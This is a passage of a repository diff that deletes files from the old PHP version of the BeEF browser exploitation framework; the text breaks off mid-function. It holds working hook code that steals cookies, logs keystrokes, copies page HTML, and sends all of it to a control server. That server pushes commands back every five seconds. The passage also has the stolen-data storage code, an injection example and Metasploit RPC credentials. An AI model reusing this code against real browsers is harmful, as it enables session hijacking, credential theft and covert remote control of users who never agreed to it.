session_name(SESSION_NAME);
session_start();
$browser = browser($_SERVER['HTTP_USER_AGENT']);
beef_log("", $_SERVER['REMOTE_ADDR']);
$browser_details = $browser['name'] . " " . $browser['version'] . " - " . extract_os();
beef_log("Zombie connected: " . $browser_details, $browser_details);
beef_log("", $_SERVER['HTTP_USER_AGENT']);
?>
top.document.onkeypress = catch_key;
if (window.attachEvent)
window.attachEvent('onload', beef_onload);
else if (window.addEventListener)
window.addEventListener('load', beef_onload, 0);
beef_url = "<?php echo BEEF_DOMAIN; ?>";
// ---[ IS_XUL_CHROME
// determing if we are in chrome (privileged browser zone)
function isXULChrome() {
try {
// check if this is a standard HTML page or a different document (e.g. XUL)
// if that is undefined, then catch() will be executed
var dummy = document.body.innerHTML;
return false;
} catch(e) {
// if we get here, that means head is undefined so probably not an HTML doc
return true;
}
}
// ---[ BEEF_ONLOAD
function beef_onload() {
return_result('loc', document.location);
return_result('cookie', document.cookie);
if( ! isXULChrome() ) {
save_page();
}
}
var key_history = new Array(4);
var magic_seq = ['B','e','E','F'];
// ---[ SAVE_PAGE
function save_page() {
var a = document.body.innerHTML;
var begin = 0;
var block_size = 1000;
while (a.length > begin) {
return_result('html', a.substring(begin,begin+block_size));
begin = begin+block_size;
}
}
// ---[ CATCH_KEY
function catch_key(e) {
var keynum;
if(window.event) { // IE
keynum = event.keyCode;
} else if(e.which) { // Netscape/Firefox/Opera
keynum = e.which;
} else {
//TODO handle error
return 0;
}
var keychar = String.fromCharCode(keynum);
// keep key history
for(i=0;i<3;i++) {
key_history[i] = key_history[i+1];
}
key_history[3] = keychar;
// check if history is magic_seq
var escape_beef = true;
for(i=0;i<4;i++) {
if(key_history[i] != magic_seq[i]){
escape_beef = false;
}
}
if(escape_beef) {
alert('Controlled by BeEF - http://www.bindshell.net');
}
// return key to beef
return_result('kl', keychar);
}
var sw = screen.width;
var sh = screen.height;
var sd = screen.colorDepth;
return_result('screen', sw+ "x" +sh+ " with " +sd+ "-bit colour");
// ---[ RETURN_RESULT
// send result to beef
function return_result(action, data) {
var img_tmp = new Image();
var src = beef_url + '/hook/return.php?BeEFSession=<?php echo session_id(); ?>&action=' + action + '&data=' + escape(data);
img_tmp.src = src;
}
// ---[ INCLUDE
function include(script_filename) {
if( ! isXULChrome() ) {
var html_doc = document.getElementsByTagName('head').item(0);
var js = document.createElement('script');
js.src = script_filename;
js.type = 'text/javascript';
js.defer = true;
html_doc.appendChild(js);
return js;
} else {
//top/root XUL elements are: window, dialog, overlay, wizard, prefwindow, page, wizard
var xul_doc;
if ((xul_doc=document.getElementsByTagName('window')[0]) || (xul_doc=document.getElementsByTagName('page')[0]) || (xul_doc=document.getElementsByTagName('dialog')[0]) || (xul_doc=document.getElementsByTagName('overlay')[0]) || (xul_doc=document.getElementsByTagName('wizard')[0]) || (xul_doc=document.getElementsByTagName('prefwindow')[0])) {
var js = document.createElementNS("http://www.w3.org/1999/xhtml","html:script");
js.setAttribute("src", script_filename);
js.setAttribute("type", "text/javascript");
js.setAttribute("defer", "true");
xul_doc.appendChild(js);
return js;
}
}
}
// start heartbeat
setInterval(function () {
var date = new Date().getTime();
include(beef_url + '/hook/command.php?BeEFSession=<?php echo session_id(); ?>&time=' + date);
}, 5000);
// run autorun module
// need setTimeout as the DOM element that is grabbed by include() function is not yet there
// our injection may occur before the element is created within the DOM
setTimeout(function () {
var date = new Date().getTime();
include(beef_url + '/hook/autorun.js.php?BeEFSession=<?php echo session_id(); ?>&time=' + date);
}, 2000);

35
hook/command.php
View File

@@ -1,35 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../include/globals.inc.php");
require_once("../include/hook.inc.php");
require_once("../include/common.inc.php");
session_name(SESSION_NAME);
session_start();
$zombie_hook_dir = ZOMBIE_TMP_DIR . session_id();
// create a directory for this zombie if it doens't exist
if(!file_exists($zombie_hook_dir)) {
mkdir($zombie_hook_dir);
}
// heartbeat - write the heartbeat details to file
$zombie_hook_heartbeat_file = $zombie_hook_dir . "/" . HEARTBEAT_FILENAME;
file_put_contents($zombie_hook_heartbeat_file, get_ua_details());
// if no command return empty file
$zombie_hook_cmd_file = $zombie_hook_dir . "/" . CMD_FILENAME;
if(!file_exists($zombie_hook_cmd_file)) { return ""; }
// get the command from $zombie_hook_cmd_file
$code = module_code_and_result_setup($zombie_hook_cmd_file);
// to ensure the code is exec only one delete the file
unlink($zombie_hook_cmd_file);
echo $code;
?>

23
hook/example.php
View File

@@ -1,23 +0,0 @@
<?php
require_once("../include/config.inc.php");
?>
<html>
<head>
<title>BeEF Test Page</title>
<link rel="stylesheet" type="text/css" href="../css/firefox/style.css">
<link rel="icon" href="favicon.ico" type="image/x-icon">
</head>
<body>
<img src="../images/beef.gif" alt="BeEF"/>BeEF Test Page<br><br>
<script language='Javascript' src="<?php echo BEEF_DOMAIN?>hook/beefmagic.js.php"></script>
The following code needs to be included in the zombie:<br>
<code>
&#x3C;script language='Javascript'
src="<?php echo BEEF_DOMAIN?>hook/beefmagic.js.php'&#x3E;&#x3C;/script&#x3E;
</code>
<br>
</body>
</html>

29
hook/ipc_bindshell.js.php
View File

@@ -1,29 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../include/globals.inc.php");
?>
onload = beef_onload;
beef_url = "<?php echo BEEF_DOMAIN; ?>";
function beef_onload() {
raw_imap_output=document.body.innerHTML;
pos=raw_imap_output.indexOf('__END__');
result=raw_imap_output.substring(pos+18, raw_imap_output.length);
result=result.replace(/\n/g,"CR");
return_result(result_id, result);
}
// ---[ RETURN_RESULT
// send result to beef
function return_result(action, data) {
var img_tmp = new Image();
var src = beef_url + '/hook/return.php?action=' + action + '&data=' + escape(data);
img_tmp.src = src;
}

29
hook/ipc_imap.js.php
View File

@@ -1,29 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../include/globals.inc.php");
?>
onload = beef_onload;
beef_url = "<?php echo BEEF_DOMAIN; ?>";
function beef_onload() {
raw_imap_output=document.body.innerHTML;
pos=raw_imap_output.indexOf('__END__');
result=raw_imap_output.substring(pos+37, raw_imap_output.length);
result=result.replace(/\n/g,"CR");
return_result(result_id, result);
}
// ---[ RETURN_RESULT
// send result to beef
function return_result(action, data) {
var img_tmp = new Image();
var src = beef_url + '/hook/return.php?action=' + action + '&data=' + escape(data);
img_tmp.src = src;
}

95
hook/return.php
View File

@@ -1,95 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../include/globals.inc.php");
require_once("../include/common.inc.php");
session_name(SESSION_NAME);
session_start();
check_zombie_dir();
// check parameters
if(!isset($_GET["action"])) beef_error('no action');
if(!isset($_GET["data"])) beef_error('no data');
// set params
$action = $_GET["action"];
$data = $_GET["data"];
// check if the data is results from a module
if(isset($_SESSION[$action])) {
// make time stamp
$time = time();
$time_html = '<b>' . date("F j, Y, g:i a", $time) . '</b>';
$encoded_data = html_encode_all($data);
$encoded_data = convert_10_br($encoded_data);
file_put_contents($_SESSION[$action], $time_html . "<br>\n", FILE_APPEND);
file_put_contents($_SESSION[$action], $encoded_data . "<br>\n", FILE_APPEND);
// the data will be encoded in beef_log()
beef_log("Module Result: \n" . $data, "Module Result: \n" . $data);
exit;
}
// take action based on the action param
switch ($action) {
case "kl": // key registered
append_data(KEYLOG_FILENAME, $data);
break;
case "screen": // screen details
save_data(SCREEN_FILENAME, $data);
beef_log("", "Screen: " . $data);
break;
case "html": // html details
$stripped_data = stripslashes($data);
append_data(HTML_FILENAME, $stripped_data);
beef_log("", "HTML Contents: " . $stripped_data);
break;
case "cookie": // cookie details
save_data(COOKIE_FILENAME, $data);
beef_log("", "Cookie: " . $data);
break;
case "loc": // location details
save_data(LOC_FILENAME, $data);
beef_log("", "Requested URL: " . $data);
break;
default: // unexpected
beef_error("unknown action: $action");
beef_log("", "Unknown Action: " . $action);
}
// --[ CHECK_ZOMBIE_DIR
function check_zombie_dir() {
$zombie_dir = ZOMBIE_TMP_DIR . session_id();
// create a directory for this zombie if it doens't exist
if(!file_exists($zombie_dir)) {
mkdir($zombie_dir);
}
}
// --[ APPEND_DATA
function append_data($filename, $data) {
if (empty($data)) { beef_error('no data to save - append data'); };
$zombie_dir = ZOMBIE_TMP_DIR . session_id();
$zombie_data_file = $zombie_dir . "/" . $filename;
file_put_contents($zombie_data_file, $data, FILE_APPEND);
}
// --[ SAVE_DATA
function save_data($filename, $data) {
if (empty($data)) { beef_error('no data to save - write data'); };
$zombie_dir = ZOMBIE_TMP_DIR . session_id();
$zombie_data_file = $zombie_dir . "/" . $filename;
file_put_contents($zombie_data_file, $data);
}
?>

BIN
images/beef.gif
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 486 B

BIN
images/bones.gif
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 356 B

BIN
images/bsd.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 253 B

BIN
images/bsdfreebsd.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 329 B

BIN
images/chrome.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 5.1 KiB

BIN
images/epiphany.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 631 B

BIN
images/firefox.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 368 B

BIN
images/konqueror.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 285 B

BIN
images/linux.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 320 B

BIN
images/mac.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 282 B

BIN
images/mozilla.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 289 B

BIN
images/msie.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 314 B

BIN
images/opera.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 284 B

BIN
images/safari.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 324 B

BIN
images/unknown.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 218 B

BIN
images/win.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 334 B

237
include/browserdetection.inc.php
View File

@@ -1,237 +0,0 @@
<?php
// Hit/Log tracker with Browser Lookup support.
// Browser Lookup by Geoffrey Sneddon, with some help from Clayton Smith.
// Rest of the script by Jordan S. C. Thompson (Hendee).
// Released under the zlib/libpng license.
// December 15, 2005
// This file's code should either be placed in the file you want it displayed or include it.
// If you include be sure to specify where the log files are in $dir.
// EXAMPLE OUTPUT
// Browser: Internet Explorer
// Browser Version: 6.0
// Operating System: Windows 98
// Internet Service Provider: Juno
// Site Hits: 65,485,455
$dir = "./";
$counterDB = "hits.dat";
$logDB = "log.dat";
$currentPage = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
function browser($ua)
{
if (preg_match('/bot/i', $ua) || preg_match('/crawl/i', $ua) || preg_match('/yahoo\!/i', $ua))
{
$return['name'] = 'Bot';
$return['version'] = 'Unknown';
}
elseif (preg_match('/opera/i', $ua))
{
preg_match('/Opera(\/| )([0-9\.]+)(u)?(\d+)?/i', $ua, $b);
$return['name'] = 'Opera';
unset($b[0], $b[1]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/msie/i', $ua))
{
preg_match('/MSIE ([0-9\.]+)(b)?/i', $ua, $b);
$return['name'] = 'Internet Explorer';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/omniweb/i', $ua))
{
preg_match('/OmniWeb\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'OmniWeb';
if (isset($b[1]))
$return['version'] = $b[1];
else
$return['version'] = 'Unknown';
}
elseif (preg_match('/icab/i', $ua))
{
preg_match('/iCab\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'iCab';
$return['version'] = $b[1];
}
elseif (preg_match('/Chrome/i', $ua))
{
$return['name'] = 'Chrome';
preg_match('/Chrome\/([0-9\.]+)/i', $ua, $b);
$return['version'] = $b[1];
}
elseif (preg_match('/safari/i', $ua))
{
preg_match('/Safari\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Safari';
$return['version'] = $b[1];
switch ($return['version'])
{
case '412':
case '412.2':
case '412.2.2':
$return['version'] = '2.0';
break;
case '412.5':
$return['version'] = '2.0.1';
break;
case '416.12':
case '416.13':
$return['version'] = '2.0.2';
break;
case '100':
$return['version'] = '1.1';
break;
case '100.1':
$return['version'] = '1.1.1';
break;
case '125.7':
case '125.8':
$return['version'] = '1.2.2';
break;
case '125.9':
$return['version'] = '1.2.3';
break;
case '125.11':
case '125.12':
$return['version'] = '1.2.4';
break;
case '312':
$return['version'] = '1.3';
break;
case '312.3':
case '312.3.1':
$return['version'] = '1.3.1';
break;
case '85.5':
$return['version'] = '1.0';
break;
case '85.7':
$return['version'] = '1.0.2';
break;
case '85.8':
case '85.8.1':
$return['version'] = '1.0.3';
break;
}
}
elseif (preg_match('/konqueror/i', $ua))
{
preg_match('/Konqueror\/([0-9\.]+)(\-rc)?(\d+)?/i', $ua, $b);
$return['name'] = 'Konqueror';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/Flock/i', $ua))
{
preg_match('/Flock\/([0-9\.]+)(\+)?/i', $ua, $b);
$return['name'] = 'Flock';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/firebird/i', $ua))
{
preg_match('/Firebird\/([0-9\.]+)(\+)?/i', $ua, $b);
$return['name'] = 'Firebird';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/phoenix/i', $ua))
{
preg_match('/Phoenix\/([0-9\.]+)(\+)?/i', $ua, $b);
$return['name'] = 'Phoenix';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/firefox/i', $ua))
{
preg_match('/Firefox\/([0-9\.]+)(\+)?/i', $ua, $b);
$return['name'] = 'Firefox';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/chimera/i', $ua))
{
preg_match('/Chimera\/([0-9\.]+)(a|b)?(\d+)?(\+)?/i', $ua, $b);
$return['name'] = 'Chimera';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/camino/i', $ua))
{
preg_match('/Camino\/([0-9\.]+)(a|b)?(\d+)?(\+)?/i', $ua, $b);
$return['name'] = 'Camino';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/seamonkey/i', $ua))
{
preg_match('/SeaMonkey\/([0-9\.]+)(a|b)?/i', $ua, $b);
$return['name'] = 'SeaMonkey';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/galeon/i', $ua))
{
preg_match('/Galeon\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Galeon';
$return['version'] = $b[1];
}
elseif (preg_match('/epiphany/i', $ua))
{
preg_match('/Epiphany\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Epiphany';
$return['version'] = $b[1];
}
elseif (preg_match('/mozilla\/5/i', $ua) || preg_match('/gecko/i', $ua))
{
preg_match('/rv(:| )([0-9\.]+)(a|b)?/i', $ua, $b);
$return['name'] = 'Mozilla';
unset($b[0], $b[1]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/mozilla\/4/i', $ua))
{
preg_match('/Mozilla\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Netscape';
$return['version'] = $b[1];
}
elseif (preg_match('/lynx/i', $ua))
{
preg_match('/Lynx\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Lynx';
$return['version'] = $b[1];
}
elseif (preg_match('/links/i', $ua))
{
preg_match('/Links \(([0-9\.]+)(pre)?(\d+)?/i', $ua, $b);
$return['name'] = 'Links';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/curl/i', $ua))
{
preg_match('/curl\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'cURL';
$return['version'] = $b[1];
}
elseif (preg_match('/wget/i', $ua))
{
preg_match('/Wget\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Wget';
$return['version'] = $b[1];
}
else
{
$return['name'] = 'Unknown';
$return['version'] = 'Unknown';
}
return $return;
}
?>

24
include/check_install.inc.php
View File

@@ -1,24 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("filter.inc.php");
if(!file_exists('../include/config.inc.php')
&& !file_exists('../../include/config.inc.php')
&& !file_exists('../../../include/config.inc.php')) {
$install_url = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
if(valid_url_without_query($install_url)) {
echo "<script>location.href = '" . $install_url . "..'</script>";
echo '<li><a href="..">Configure BeEF</a></li>';
} else {
echo 'Install and configure BeEF first';
}
exit(0);
}
?>

157
include/common.inc.php
View File

@@ -1,157 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("globals.inc.php");
// --[ BEEF_JS_ERROR
function beef_js_error($str) {
echo('<script>alert("' . $str . '")</script>');
}
// ---[ GET_B64_FILE
// returns the contents of a file in base64
function get_b64_file($file) {
$raw = file_get_contents($file);
$result = base64_encode($raw);
return $result;
}
// --[ BEEF_ERROR
function beef_error() {
echo ERROR_GENERIC;
exit;
}
// --[ GET_LOG
// returns the log file
function get_log() {
$raw = file_get_contents(LOG_FILE);
$log_data = "";
$log_data = html_encode_all($raw);
$log_data = convert_10_BR($log_data);
return $log_data;
}
// --[ GET_LOG
// returns the log file
function get_summary_log() {
$raw = file_get_contents(SUMMARY_LOG_FILE);
return $raw;
}
function convert_10_BR($str) {
return preg_replace('/&#10;/', "<br>", $str);
}
// --[ HTML_ENCODE_ALL
// html encodes all characters
function html_encode_all($str) {
$rtnstr = "";
$strlength = strlen($str);
for($i = 0; $i < $strlength; $i++){
$rtnstr .= "&#" . ord($str[$i]) . ";";
}
return $rtnstr;
}
// --[BEEF_LOG
// log an entry to the beef log
function beef_log($summary, $str) {
// below includes session info - for nat'ed browsers
$time_stamp = date("d/m/y H:i:s", time());
$zombie_id = md5(session_id());
// create full log
$log_entry = "[" . $time_stamp . " " . $_SERVER['REMOTE_ADDR'] . "] " . $str;
file_put_contents(LOG_FILE, $log_entry . "\n", FILE_APPEND);
//create summary log
if($summary != "") {
$time_stamp_link = "<a href=\"javascript:change_zombie('" . md5(session_id()) . "')\">" ;
$time_stamp_link .= "[" . $time_stamp . " " . $_SERVER['REMOTE_ADDR'] . "]</a>";
$safe_summary = html_encode_all($summary);
$safe_summary = convert_10_BR($safe_summary);
$log_entry = $time_stamp_link . "<br>" . $safe_summary;
file_start_put_contents(SUMMARY_LOG_FILE, $log_entry . "<br>");
}
}
function file_start_put_contents($file, $contents) {
$temp = tempnam(TMP_DIR, "delme");
touch($temp);
file_put_contents($temp, $contents, FILE_APPEND);
$raw = file_get_contents($file);
file_put_contents($temp, $raw, FILE_APPEND);
unlink($file);
copy($temp, $file);
unlink($temp);
}
if (!function_exists('file_put_contents')) {
define('FILE_APPEND', 1);
function file_put_contents($n, $d, $flag = false) {
$mode = ($flag == FILE_APPEND || strtoupper($flag) == 'FILE_APPEND') ? 'a' : 'w';
$f = @fopen($n, $mode);
if ($f === false) {
return 0;
} else {
if (is_array($d)) $d = implode($d);
$bytes_written = fwrite($f, $d);
fclose($f);
return $bytes_written;
}
}
}
// --[ MODULE_CODE_AND_RESULT_SETUP
// this sets up session details for the return of the results and
// constructs the code
function module_code_and_result_setup($cmd_file) {
// construct file location strings
$zombie_hook_dir = ZOMBIE_TMP_DIR . session_id();
// create a directory for this zombie if it doens't exist
if(!file_exists($zombie_hook_dir)) {
mkdir($zombie_hook_dir);
}
$zombie_hook_cmd_file = $zombie_hook_dir . "/" . CMD_FILENAME;
$zombie_hook_res_file = $zombie_hook_dir . "/" . RES_FILENAME;
$zombie_hook_res_loc_file = $zombie_hook_dir . "/" . RES_LOC_FILENAME;
// set the location of the results file in the session
$result_id = md5(rand());
$_SESSION[$result_id] = $zombie_hook_res_file;
// determine where to put the results
if(file_exists($zombie_hook_res_loc_file)) {
$res_loc_arr = file($zombie_hook_res_loc_file);
$_SESSION[$result_id] = MODULE_TMP_DIR . $res_loc_arr[0];
$_SESSION['append'] = 1;
unlink($zombie_hook_res_loc_file);
} else {
$_SESSION[$result_id] = $zombie_hook_res_file;
$_SESSION['append'] = 0;
}
// get the javascript command file
$cmd_file_content = file_get_contents($cmd_file);
// return javascript string to set result_id
$js_result_id_code ="var result_id = '$result_id';\n";
return $js_result_id_code . $cmd_file_content;
}
?>

26
include/filter.inc.php
View File

@@ -1,26 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
function valid_ip($ip) {
return filter_var($ip, FILTER_VALIDATE_IP);
}
function valid_port($port) {
$int_options = array("options"=>array("min_range"=>0, "max_range"=>65535));
return filter_var($port, FILTER_VALIDATE_INT, $int_options);
}
function valid_url($url) {
if( preg_match("/\.\./", $url) ) return FALSE;
if( ! preg_match("/^[\-a-zA-Z0-9\._:\/~]*$/", $url) ) return FALSE;
return filter_var($url, FILTER_VALIDATE_URL, FILTER_FLAG_SCHEME_REQUIRED);
}
function valid_url_without_query($url) {
if(filter_var($url, FILTER_FLAG_QUERY_REQUIRED)) return FALSE;
return valid_url($url);
}
?>

112
include/globals.inc.php
View File

@@ -1,112 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
// if check_install.inc.php works this should exist
require_once("check_install.inc.php");
require_once("config.inc.php");
// files and directories
// module
define('MODULE_DIR', BASE_DIR . "modules/");
define('MODULE_STANDARD_SUBDIR', "standard");
define('MODULE_BROWSER_SUBDIR', "browser");
define('MODULE_NETWORK_SUBDIR', "network");
define('MODULE_INTERPROTOCOL_SUBDIR', "interprotocol");
define('MODULE_STANDARD_DIR', MODULE_DIR . MODULE_STANDARD_SUBDIR . "/");
define('MODULE_BROWSER_DIR', MODULE_DIR . MODULE_BROWSER_SUBDIR . "/");
define('MODULE_NETWORK_DIR', MODULE_DIR . MODULE_NETWORK_SUBDIR . "/");
define('MODULE_INTERPROTOCOL_DIR', MODULE_DIR . MODULE_INTERPROTOCOL_SUBDIR . "/");
// temp
define('TMP_DIR', BASE_DIR . "cache/");
define('ZOMBIE_TMP_DIR', TMP_DIR . "zombies/");
define('AUTORUN_TMP_DIR', TMP_DIR . "autorun/");
define('MODULE_TMP_DIR', TMP_DIR . "modules/");
define('AUTORUN_TMP_FILENAME', "autorun.js");
// other
define('JAVASCRIPT_DIR', BASE_DIR . "js/");
define('CMD_FILE', TMP_DIR . "cmd.js");
define('CMD_FILE_BAK', TMP_DIR . "cmd.js.bak");
define('CMD_RESULT_FILE', TMP_DIR . "cmd.res");
define('CMD_RESULT_FILE_BAK', TMP_DIR . "cmd.res.bak");
define('HEARTBEAT_FILE', TMP_DIR . "heartbeat");
define('HEARTBEAT_FILENAME', "heartbeat");
define('KEYLOG_FILENAME', "keylog");
define('SCREEN_FILENAME', "screen");
define('HTML_FILENAME', "content.html");
define('COOKIE_FILENAME', "cookie.txt");
define('LOC_FILENAME', "loc.txt");
define('RES_LOC_FILENAME', "res_loc");
define('CLIPBOARD_FILENAME', "clipboard.txt");
define('CMD_FILENAME', "cmd");
define('RES_FILENAME', "result");
define('MODULE_NAME_FILENAME', "name.txt");
define('BASE64_JAVASCRIPT_FILE', JAVASCRIPT_DIR . "base64.js");
define('BASE64REPLACE_JAVASCRIPT_FILE', JAVASCRIPT_DIR . "base64replace.js");
define('HEARTBEAT_TIME', "10000");
define('HEARTBEAT_FREQUENCY', 5);
define('SUMMARY_LOG_HEARTBEAT_FREQUENCY', 3);
// session
define('SESSION_NAME', "BeEFSession");
// strings
define('DNA_STRING', "Data not available");
define('ERROR_GENERIC', "Error ");
// zombies (sidebar)
define('ZOMBIE_NONE', '<li><a href="#">None Connected</a></li>');
define('ZOMBIE_IMG_ATT', ' width="12" height="12" align="top" border="0"');
define('ZOMBIE_UA_IMG_TAG', '<img src="../images/AGENT"' . ZOMBIE_IMG_ATT . '>');
define('ZOMBIE_OS_IMG_TAG', '<img src="../images/OS"' . ZOMBIE_IMG_ATT . '>');
define('ZOMBIE_IP_TAG', '<div id="zombietext">IPADDRESS</div>');
define('ZOMBIE_CHANGE_HREF', '<a href="javascript:change_zombie(\'ZOMBIE\')">');
define('ZOMBIE_NOT_SEL_TAG', '<div id=\'zombies\'>');
define('ZOMBIE_SEL_TAG', '<div id=\'zombiessel\'>');
define('ZOMBIE_LINK', ZOMBIE_NOT_SEL_TAG . ZOMBIE_CHANGE_HREF . ZOMBIE_UA_IMG_TAG .
ZOMBIE_OS_IMG_TAG . ZOMBIE_IP_TAG . '</a></div>');
define('ZOMBIE_LINK_SEL', ZOMBIE_SEL_TAG . ZOMBIE_CHANGE_HREF . ZOMBIE_UA_IMG_TAG .
ZOMBIE_OS_IMG_TAG . ZOMBIE_IP_TAG . '</a></div>');
define('MODULE_BUTTON_HTML', '<input class="button" type="button" value="NAME" ' .
'onClick="change_module(\'../modules/PATH/\')"/>' . "\n");
define('MODULE_MENU_ITEM_HTML', '<li><a href="#" onClick="change_module(\'PATH\')">NAME</a></li>');
// install
define('INSTALL_WARNING_TEXT', 'ERROR: BeEF may not have been installed correctly.Edit the "' .
'define(\'BASE_DIR\', "/var/.../htdocs/beef/");' .
' line of the \'globals.inc.php\' file in the \'include\' dirrctory and point' .
' this value at the BeEf install directory.');
define('INSTALL_WARNING', '<font size="4" color="red">' . INSTALL_WARNING_TEXT . '</font>');
// agents
define('AGENT_UNKNOWN_IMG', "unknown.png");
define('AGENT_FIREFOX_UA_STR', "Firefox");
define('AGENT_FIREFOX_IMG', "firefox.png");
define('AGENT_MOZILLA_UA_STR', "Mozilla");
define('AGENT_MOZILLA_IMG', "mozilla.png");
define('AGENT_IE_UA_STR', "Internet Explorer");
define('AGENT_IE_IMG', "msie.png");
define('AGENT_SAFARI_UA_STR', "Safari");
define('AGENT_SAFARI_IMG', "safari.png");
define('AGENT_KONQ_UA_STR', "Konqueror");
define('AGENT_KONQ_IMG', "konqueror.png");
define('AGENT_CHROME_UA_STR', "Chrome");
define('AGENT_CHROME_IMG', "chrome.png");
// os'es
define('OS_UNKNOWN_IMG', "unknown.png");
define('OS_WINDOWS_UA_STR', "Windows");
define('OS_WINDOWS_IMG', "win.png");
define('OS_LINUX_UA_STR', "Linux");
define('OS_LINUX_IMG', "linux.png");
define('OS_MAC_UA_STR', "Mac");
define('OS_MAC_IMG', "mac.png");
?>

65
include/hook.inc.php
View File

@@ -1,65 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../include/globals.inc.php");
require_once("../include/browserdetection.inc.php");
// --[ EXTRACT_OS
function extract_os() {
$user_parts = explode(";", $_SERVER['HTTP_USER_AGENT']);
$os = trim($user_parts[2]);
$os = str_replace(')', '', $os);
return $os;
}
// ---[ GET_UA_DETAILS
function get_ua_details() {
$ip = $_SERVER['REMOTE_ADDR'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$browser = browser($_SERVER['HTTP_USER_AGENT']);
$os = extract_os();
// return the collected useragent details
return $ip . "\n" .
$browser['name'] . "\n" .
$browser['version'] . "\n" .
$os . "\n" .
$agent;
}
// ---[ REGISTER_HEARTBEAT
function register_heartbeat($status, $result) {
// construct file location strings
$zombie_hook_dir = ZOMBIE_TMP_DIR . session_id();
$zombie_hook_heartbeat_file = $zombie_hook_dir . "/" . HEARTBEAT_FILENAME;
$zombie_hook_cmd_file = $zombie_hook_dir . "/" . CMD_FILENAME;
$zombie_hook_res_file = $zombie_hook_dir . "/" . RES_FILENAME;
// create a directory for this zombie if it doens't exist
if(!file_exists($zombie_hook_dir)) {
mkdir($zombie_hook_dir);
}
// heartbeat
// write the heartbeat details to file
file_put_contents($zombie_hook_heartbeat_file, get_ua_details());
// if there is a result write it to file
if($status != HEARTBEAT_NOP) {
file_put_contents($zombie_hook_res_file, $result);
}
if(!file_exists($zombie_hook_cmd_file)) { return 0; }
// get the command from $zombie_hook_cmd_file
$lines = file($zombie_hook_cmd_file);
unlink($zombie_hook_cmd_file);
return join("\n", $lines);
}
?>

7
include/msf.inc.php
View File

@@ -1,7 +0,0 @@
<?php
define('MSF_HOST', '127.0.0.1');
define('MSF_PORT', '55553');
define('MSF_USER', 'msf');
define('MSF_PASS', 'BeEFMSFPass');
define('MSF_BASE_URL', 'http://192.168.1.235');
?>

134
include/msf_filter.inc.php
View File

@@ -1,134 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("filter.inc.php");
function get_and_filter_exploit() {
$exploit = $_GET["exploit"];
if(strlen($exploit) > 50) {
return FALSE;
}
if( !( preg_match("/multi\/browser\/[a-z_]+/", $exploit) ||
preg_match("/osx\/browser\/[a-z_]+/", $exploit) ||
preg_match("/windows\/browser\/[a-z_]+/", $exploit)) ) {
return FALSE;
}
return $exploit;
}
function get_and_filter_payload() {
$payload = $_GET["payload"];
